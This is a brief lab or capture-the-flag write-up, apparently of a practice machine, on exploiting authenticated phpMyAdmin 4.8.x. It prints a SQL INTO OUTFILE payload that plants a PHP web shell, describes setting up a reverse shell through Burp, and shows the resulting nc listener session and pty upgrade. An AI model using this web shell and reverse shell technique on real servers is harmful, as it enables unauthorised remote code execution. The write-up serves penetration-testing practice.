Phpmyadmin exploit on version 4.8.0 and 4.8.1 Link to heading

We have a phpmyadmin page and we have login credentials. The version of “phpmyadmin” is 4.8.

Refer the logged in page

As per search sploit we LFI vulnarability if the user is authenticated.

It says the exploit allows the malicious code in terms of sql query if the user is authenticated. In this case we are authenticated and lets insert below code into sql query option.

SELECT "<?php system($_GET['c']); ?>" into outfile "/var/www/html/shell3.php"

I have added the reverse shell code and encoded using the burp. ( use the same c=id) command from browser and modify it to reverse shell command on burp.) Use CNTRL +U to encode in Burp

I have the reverse shell once we access the newly uploaded

$ rlwrap nc -nvlp 4242 
listening on [any] 4242 ...
connect to [10.10.14.3] from (UNKNOWN) [10.10.10.143] 44524
/bin/sh: 0: can't access tty; job control turned off
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
python -c 'import pty; pty.spawn("/bin/sh")'
$